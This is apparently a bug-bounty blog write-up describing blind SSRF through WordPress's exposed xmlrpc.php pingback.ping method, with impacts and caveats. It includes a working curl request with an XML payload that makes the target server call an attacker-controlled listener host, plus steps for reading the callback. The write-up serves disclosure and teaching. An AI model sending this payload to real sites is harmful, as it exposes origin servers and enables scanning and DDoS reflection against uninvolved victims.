
This bug is called BLIND SSRF VIA XMLRPC PINGBACK METHOD.

While testing the website, I discovered that the WordPress XML-RPC endpoint (/xmlrpc.php) is exposed and accepts unauthenticated pingback.ping requests. This allows an attacker to force the server to initiate outbound HTTP requests to attacker-controlled domains.

This creates a blind Server-Side Request Forgery (SSRF) primitive. The attacker can use this behaviour to:

  • Discover the origin IP and network position of the server (the callback comes from the origin host itself, even when a CDN or WAF fronts the site)
  • Potentially scan/reach internal hosts (private IP ranges), subject to the URL validation current WordPress applies to outbound fetches
  • Abuse the site as a DDoS reflector toward any external victim

How to find it:

  1. Visit https://www.redacted.com/xmlrpc.php and check whether it is accessible. If it is blocked you will get 403 FORBIDDEN; if it is open, WordPress answers a plain GET with "XML-RPC server accepts POST requests only." (Another quick tell is the X-Pingback response header WordPress adds to its front-end pages.)
  2. Prepare an out-of-band listener (Burp Collaborator / Interactsh).
  3. Capture its unique callback URL (e.g., http://<attacker-domain>.oast.me).
  4. Send the request:
# xmlrpc.php only accepts POST and expects Content-Type: text/xml.
# First param  = sourceURI: the URL the server will fetch (your listener; replace the placeholder host).
# Second param = targetURI: must resolve to a pingback-enabled post on the target site. If the
#                site root returns a fault and no callback arrives, use a post permalink such as /?p=1.
curl -s -H "Content-Type: text/xml" \
--data '<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://xxxxxxxx.oastify.com</string></value></param>
    <param><value><string>https://www.[REDACTED]</string></value></param>
  </params>
</methodCall>' \
https://www.[REDACTED]/xmlrpc.php
  5. Observe the DNS/HTTP requests received at the listener. The source IP of the callback is the origin server (it bypasses any CDN or WAF in front of the site), and the User-Agent has the form WordPress/<version>; <site URL>; verifying pingback from <your IP>, with current versions also sending an X-Pingback-Forwarded-For header carrying the address that submitted the pingback. The XML-RPC reply is a secondary signal: fault 17 ("The source URL does not contain a link to the target URL...") means the fetch happened; fault 33 means the target URL was not a pingback-enabled post and nothing was fetched, so retry with a post permalink.

Potential Impact this vulnerability can have is:

  • Blind SSRF: the attacker directs server-side requests to arbitrary external addresses; the response body is never returned, so only the DNS/HTTP callback confirms it
  • Server IP / network exposure: the origin IP is leaked via the callback even when the site sits behind a CDN or WAF
  • DDoS reflection: a long-known attack vector in which many WordPress sites are pointed at one victim URL via pingback.ping
  • Possible interaction with internal admin panels, cloud metadata endpoints, or private infrastructure if reachable. Caveat: current WordPress performs the fetch with wp_safe_remote_get(), which by default refuses loopback and RFC 1918 targets and ports other than 80, 443 and 8080, so internal scanning usually needs an old version or a site that overrides the http_request_host_is_external filter; link-local addresses such as the cloud metadata endpoint are not in that deny list

No authentication required → botnet-style exploitation becomes trivial.

Below I am giving other HackerOne reports for the same vulnerability:

Next, it was accepted by the program as a P4. I wasn't paid, but I still got a certificate:


Like and follow if you enjoyed, and comment if you want an article on a specific topic.


Stay curious. Stay dangerous. 💻🕶
